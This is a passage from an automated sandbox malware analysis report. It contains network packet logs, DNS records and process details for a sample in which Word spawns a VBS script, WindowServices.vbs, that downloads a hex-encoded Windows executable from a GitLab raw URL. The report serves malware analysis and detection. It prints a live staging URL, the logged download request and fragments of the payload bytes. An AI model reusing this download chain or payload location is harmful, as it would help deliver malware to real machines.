        Jan 14, 2025 16:38:34.329596996 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.329637051 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.329639912 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.329659939 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.329675913 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.334471941 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.334491968 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.334583044 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.334588051 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.334664106 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.334769011 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.334791899 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.334816933 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.334820986 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.334839106 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.334852934 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.335037947 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.335058928 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.335103989 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.335108042 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.335140944 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.335253954 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.335268974 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.335305929 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.335309982 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.335328102 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.335340023 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.335572004 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.335587025 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.335633993 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.335639000 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.335652113 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.335675955 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.419895887 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.419929028 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.419975042 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.419991970 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.420005083 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.420037031 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.420227051 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.420248985 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.420295000 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.420299053 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.420309067 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.420341015 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.420681000 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.420706987 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.420762062 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.420764923 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.420773983 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.420800924 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.425606966 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.425633907 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.425669909 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.425673962 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.425698042 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.425719023 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.425863028 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.425879955 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.425980091 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.425983906 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.426059008 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.426135063 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.426151037 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.426198006 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.426203966 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.426215887 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.426239967 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.426457882 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.426479101 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.426546097 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.426549911 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.426614046 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.426666021 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.426681042 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.426726103 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.426731110 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.426932096 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.510991096 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.511024952 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.511121988 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.511142015 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.511199951 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.511226892 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.511254072 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.511257887 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:34.511280060 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:34.511321068 CET49718443192.168.2.5172.65.251.78

        DNS Queries

        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Jan 14, 2025 16:38:31.775293112 CET192.168.2.51.1.1.10x5a5eStandard query (0)gitlab.comA (IP address)IN (0x0001)false

        DNS Answers

        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Jan 14, 2025 16:38:28.451658964 CET1.1.1.1192.168.2.50x8e7aNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.20A (IP address)IN (0x0001)false
        Jan 14, 2025 16:38:28.451658964 CET1.1.1.1192.168.2.50x8e7aNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.23A (IP address)IN (0x0001)false
        Jan 14, 2025 16:38:28.451658964 CET1.1.1.1192.168.2.50x8e7aNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.35A (IP address)IN (0x0001)false
        Jan 14, 2025 16:38:28.451658964 CET1.1.1.1192.168.2.50x8e7aNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.19A (IP address)IN (0x0001)false
        Jan 14, 2025 16:38:28.451658964 CET1.1.1.1192.168.2.50x8e7aNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.36A (IP address)IN (0x0001)false
        Jan 14, 2025 16:38:28.451658964 CET1.1.1.1192.168.2.50x8e7aNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.18A (IP address)IN (0x0001)false
        Jan 14, 2025 16:38:28.451658964 CET1.1.1.1192.168.2.50x8e7aNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.39A (IP address)IN (0x0001)false
        Jan 14, 2025 16:38:28.451658964 CET1.1.1.1192.168.2.50x8e7aNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.34A (IP address)IN (0x0001)false
        Jan 14, 2025 16:38:31.782253027 CET1.1.1.1192.168.2.50x5a5eNo error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false

        HTTPS Proxied Packets

        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.549718172.65.251.784437656C:\Windows\SysWOW64\wscript.exe
        TimestampBytes transferredDirectionData
        2025-01-14 15:38:32 UTC327OUTGET /app8490744/updatesa/-/raw/main/up HTTP/1.1
        Accept: */*
        Accept-Language: en-ch
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: gitlab.com
        Connection: Keep-Alive
        2025-01-14 15:38:32 UTC464INHTTP/1.1 200 OK
        Date: Tue, 14 Jan 2025 15:38:32 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 78347968
        Connection: close
        CF-Ray: 901eb6b06b78729b-EWR
        CF-Cache-Status: REVALIDATED
        Accept-Ranges: bytes
        Cache-Control: max-age=60, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
        Content-Disposition: inline
        ETag: "10f836507cd97c5afcfd16e3634fea62"
        Strict-Transport-Security: max-age=31536000
        Vary: Accept
        2025-01-14 15:38:32 UTC2134INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
        Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
        2025-01-14 15:38:32 UTC502INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 33 6f 4e 54 69 65 43 36 6f 42 59 38 63 43 52 44 39 51 69 46 41 50 38 25 32 46 74 70 68 5a 6e 41 61 78 44 25 32 42 30 37 75 5a 58 32 55 74 46 5a 58 42 52 6a 57 67 78 4e 25 32 42 49 64 48 75 38 6e 48 32 73 25 32 42 52 64 4b 70 75 41 30 72 6f 4c 30 4f 32 41 6e 47 43 5a 51 66 75 43 6f 4f 6d 75 76 79 58 57 57 45 32 6e 65 34 6a 43 33 76 4b 66 63 71 38 64 69 65 51 42 6e 6a 4d 6e 4c 34 38 4d 72 73 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c
        Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3oNTieC6oBY8cCRD9QiFAP8%2FtphZnAaxD%2B07uZX2UtFZXBRjWgxN%2BIdHu8nH2s%2BRdKpuA0roL0O2AnGCZQfuCoOmuvyXWWE2ne4jC3vKfcq8dieQBnjMnL48Mrs%3D"}],"group":"cf-nel","max_age":604800}NEL
        2025-01-14 15:38:32 UTC1369INData Raw: 34 64 35 61 39 30 30 30 30 33 30 30 30 30 30 30 30 34 30 30 30 30 30 30 66 66 66 66 30 30 30 30 62 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 65 31 66 62 61 30 65 30 30 62 34 30 39 63 64 32 31 62 38 30 31 34 63 63 64 32 31 35 34 36 38 36 39 37 33 32 30 37 30 37 32 36 66 36 37 37 32 36 31 36 64 32 30 36 33 36 31 36 65 36 65 36 66 37 34 32 30 36 32 36 35 32 30 37 32 37 35 36 65 32 30 36 39 36 65 32 30 34 34 34 66 35 33 32 30 36 64 36 66 36 34 36 35 32 65 30 64 30 64 30 61 32 34 30 30 30 30 30 30 30 30 30 30 30 30 30
        Data Ascii: 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a240000000000000
        2025-01-14 15:38:32 UTC1369INData Raw: 34 36 31 30 30 30 30 66 63 36 30 30 33 30 30 30 30 61 30 37 62 30 30 30 30 36 32 30 33 30 30 30 30 30 63 37 61 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 34 30 32 65 36 34 36 39 36 34 36 31 37 34 30 30 30 30 33 38 30 30 30 30 30 30 30 30 31 30 37 66 30 30 30 30 30 32 30 30 30 30 30 30 36 65 37 64 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 63 30 35 33 36 35 36 33 37 34 36 39 36 66 36 65 30 30 30 38 30 30 30 30 30 30 30 30 32 30 37 66 30 30 30 30 30 32 30 30 30 30 30 30 37 30 37 64 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 63 30 35 66 35 32 34 34 34 31 35 34 34 31 30 30 30 30 30 38 33 32 30 31 30 30
        Data Ascii: 4610000fc60030000a07b0000620300000c7a00000000000000000000000000400000402e646964617400003800000000107f0000020000006e7d00000000000000000000000000400000c053656374696f6e000800000000207f000002000000707d00000000000000000000000000400000c05f5244415441000008320100
        2025-01-14 15:38:32 UTC1369INData Raw: 65 39 35 63 30 30 63 63 63 63 63 63 63 63 34 38 38 33 65 63 32 38 66 32 30 66 31 30 30 35 37 34 62 35 37 39 30 30 36 36 30 66 32 65 30 35 34 34 39 31 37 30 30 30 37 61 32 37 37 35 32 35 34 38 38 64 34 63 32 34 33 30 66 66 31 35 38 35 62 66 36 31 30 30 30 66 35 37 63 30 66 32 34 38 30 66 32 61 34 34 32 34 33 30 66 32 30 66 35 65 30 35 36 33 39 30 37 30 30 30 66 32 30 66 31 31 30 35 34 33 62 35 37 39 30 30 34 38 63 37 30 35 65 38 66 63 37 61 30 30 30 30 30 30 30 30 30 30 34 38 38 33 63 34 32 38 63 33 63 63 63 63 63 63 34 38 38 64 30 64 38 39 64 38 35 63 30 30 34 38 38 64 30 35 62 62 64 38 35 63 30 30 34 38 32 62 63 31 34 38 38 64 30 64 37 38 64 30 35 63 30 30 34 38 38 39 30 35 65 39 63 65 37 39 30 30 34 38 38 64 30 35 39 31 64 30 35 63 30 30 34 38 32 62 63
        Data Ascii: e95c00cccccccc4883ec28f20f100574b57900660f2e05449170007a277525488d4c2430ff1585bf61000f57c0f2480f2a442430f20f5e0563907000f20f110543b5790048c705e8fc7a00000000004883c428c3cccccc488d0d89d85c00488d05bbd85c00482bc1488d0d78d05c00488905e9ce7900488d0591d05c00482bc
        2025-01-14 15:38:32 UTC1369INData Raw: 38 30 39 30 39 30 39 30 39 30 36 30 31 30 31 30 63 30 39 30 63 30 63 30 37 30 37 30 37 30 37 30 37 30 63 30 63 30 63 30 63 30 63 30 37 30 63 30 37 30 63 30 37 30 63 30 37 30 63 30 37 30 63 30 37 30 39 30 63 30 61 30 61 30 61 30 61 30 61 30 62 30 62 30 61 30 61 30 61 30 61 30 61 30 61 30 61 30 62 30 62 30 61 30 61 30 62 30 62 30 39 30 63 30 63 30 63 30 39 30 63 30 63 30 31 30 39 30 63 30 63 30 62 30 62 30 62 30 62 30 31 30 63 30 63 30 63 30 31 30 63 30 63 30 32 30 33 30 31 30 30 30 61 30 61 30 61 30 61 30 63 30 62 30 63 30 61 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 31 30 63 30 38 30 38 30 38 30 38 30 38 30 63 30 63 30 39 30 39 30 39 30 63 30 39 63 63 63 63 63 63 63 63 63 63 63 63 36 35 34 38 38 62 30 34 32 35
        Data Ascii: 8090909090601010c090c0c07070707070c0c0c0c0c070c070c070c070c070c07090c0a0a0a0a0a0b0b0a0a0a0a0a0a0a0b0b0a0a0b0b090c0c0c090c0c01090c0c0b0b0b0b010c0c0c010c0c020301000a0a0a0a0c0b0c0a0c0c0c0c0c0c0c0c0c0c0c0c0c0c010c08080808080c0c0909090c09cccccccccccc65488b0425
        2025-01-14 15:38:32 UTC1369INData Raw: 38 33 63 34 32 30 35 66 63 33 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 38 30 37 39 30 61 30 30 34 63 38 62 63 32 37 34 31 38 34 38 38 62 30 32 34 38 38 64 39 31 35 30 30 31 30 30 30 30 34 39 38 62 63 38 34 38 38 62 34 30 31 38 34 38 66 66 32 35 66 37 63 37 36 31 30 30 63 33 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 34 38 38 39 34 63 32 34 30 38 35 33 34 38 38 33 65 63 33 30 34 38 38 62 64 39 38 30 37 39 30 61 30 30 37 34 32 30 34 63 38 62 30 31 34 38 63 37 34 34 32 34 32 30 30 30 30 30 30 30 30 30 34 63 38 62 38 39 36 38 30 31 30 30 30 30 34 35 38 62 30 30 30 66 62 37 35 31 30 38 65 38 35 65 64 32 33 30 30 30 39 30 34 38 38 64 38 33 35 30 30 31 30 30 30 30 34 38 38 39 34 34 32 34 34 38 66 36 34 30 30
        Data Ascii: 83c4205fc3cccccccccccccccccc80790a004c8bc27418488b02488d9150010000498bc8488b401848ff25f7c76100c3cccccccccccccccccccccccccccc48894c2408534883ec30488bd980790a0074204c8b0148c7442420000000004c8b8968010000458b000fb75108e85ed2300090488d83500100004889442448f6400
        2025-01-14 15:38:32 UTC1369INData Raw: 38 31 30 34 38 36 33 63 31 34 38 38 64 30 63 63 35 30 30 30 30 30 30 30 30 34 64 38 39 33 34 30 62 34 39 38 62 37 30 32 30 34 38 30 33 66 31 37 34 63 34 66 66 34 66 32 30 65 39 33 61 30 31 30 30 30 30 34 31 38 62 63 65 38 62 35 37 31 30 38 64 30 34 31 32 62 65 66 63 33 66 30 30 30 30 33 62 63 36 30 66 34 32 66 30 34 34 33 62 65 39 30 66 38 36 30 62 30 31 30 30 30 30 34 31 38 62 65 64 34 31 33 62 64 35 30 66 34 37 65 61 34 35 38 35 66 66 37 34 31 30 34 39 38 62 63 63 65 38 31 65 63 65 30 33 30 30 34 35 38 62 66 65 34 34 38 39 37 34 32 34 33 38 63 37 34 34 32 34 32 38 30 36 30 30 30 30 30 30 34 34 38 39 37 34 32 34 32 30 34 35 33 33 63 39 34 31 62 38 31 64 30 30 30 30 30 30 34 38 38 62 31 35 63 39 33 61 37 61 30 30 34 38 38 64 34 63 32 34 37 30 65 38 62 66
        Data Ascii: 8104863c1488d0cc5000000004d89340b498b70204803f174c4ff4f20e93a010000418bce8b57108d0412befc3f00003bc60f42f0443be90f860b010000418bed413bd50f47ea4585ff7410498bcce81ece0300458bfe4489742438c74424280600000044897424204533c941b81d000000488b15c93a7a00488d4c2470e8bf
        2025-01-14 15:38:32 UTC1369INData Raw: 39 30 34 38 38 64 38 62 33 30 30 33 30 30 30 30 65 38 35 38 63 65 30 30 30 30 39 30 34 38 38 64 38 62 64 38 30 33 30 30 30 30 65 38 34 62 63 65 30 30 30 30 39 30 34 38 38 64 38 33 38 38 30 34 30 30 30 30 34 38 38 39 34 34 32 34 33 38 34 38 38 39 33 38 34 38 38 39 37 38 30 38 34 38 38 39 37 38 31 30 34 38 38 39 37 38 31 38 34 38 38 39 37 38 32 30 34 38 38 39 37 38 32 38 34 38 38 39 62 62 36 38 30 32 30 30 30 30 34 38 38 39 62 62 37 38 30 32 30 30 30 30 34 38 38 62 30 64 34 32 33 33 37 61 30 30 34 38 38 62 30 31 34 38 38 62 34 30 31 30 66 66 31 35 36 64 63 32 36 31 30 30 34 38 38 39 38 33 37 30 30 32 30 30 30 30 34 38 38 39 62 62 38 30 30 32 30 30 30 30 30 66 35 37 63 30 30 66 31 31 34 33 30 38 30 66 31 31 34 33 31 38 30 66 31 31 34 33 32 38 30 66 31 31 34
        Data Ascii: 90488d8b30030000e858ce000090488d8bd8030000e84bce000090488d8388040000488944243848893848897808488978104889781848897820488978284889bb680200004889bb78020000488b0d42337a00488b01488b4010ff156dc26100488983700200004889bb800200000f57c00f1143080f1143180f1143280f114
        2025-01-14 15:38:32 UTC1369INData Raw: 30 30 30 30 66 35 37 63 30 30 66 31 31 30 33 30 66 31 31 34 33 31 30 30 66 31 31 34 33 32 30 30 66 31 31 34 33 33 30 38 31 34 62 32 38 30 30 30 30 30 30 34 30 34 38 38 62 63 62 66 66 31 35 62 64 62 36 36 31 30 30 38 62 34 33 32 38 32 35 30 31 30 30 30 30 63 30 30 64 30 31 30 30 30 30 38 30 38 39 34 33 32 38 63 37 34 33 33 30 30 31 30 30 30 30 30 30 63 37 34 33 33 34 30 31 30 30 30 30 30 30 38 31 38 66 30 30 30 31 30 30 30 30 30 30 30 30 30 30 34 30 34 38 38 64 38 66 64 38 30 30 30 30 30 30 66 66 31 35 38 38 62 36 36 31 30 30 38 62 38 37 30 30 30 31 30 30 30 30 32 35 30 30 30 30 30 30 63 30 30 66 62 61 65 38 31 66 38 39 38 37 30 30 30 31 30 30 30 30 38 31 38 66 33 30 30 31 30 30 30 30 30 30 30 30 30 30 34 30 34 38 38 64 38 66 30 38 30 31 30 30 30 30 66 66
        Data Ascii: 0000f57c00f11030f1143100f1143200f114330814b2800000040488bcbff15bdb661008b432825010000c00d01000080894328c7433001000000c7433401000000818f0001000000000040488d8fd8000000ff1588b661008b870001000025000000c00fbae81f898700010000818f3001000000000040488d8f08010000ff


        Statistics

        CPU Usage

        Click to jump to process

        Memory Usage

        Click to jump to process

        High Level Behavior Distribution

        Click to dive into process behavior distribution

        Behavior

        Click to jump to process

        System Behavior

        General

        Target ID:0
        Start time:10:38:21
        Start date:14/01/2025
        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        Wow64 process (32bit):true
        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x3a0000
        File size:1'620'872 bytes
        MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        General

        Target ID:8
        Start time:10:38:30
        Start date:14/01/2025
        Path:C:\Windows\SysWOW64\wscript.exe
        Wow64 process (32bit):true
        Commandline:C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs"
        Imagebase:0x860000
        File size:147'456 bytes
        MD5 hash:FF00E0480075B095948000BDC66E81F0
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Disassembly

        No disassembly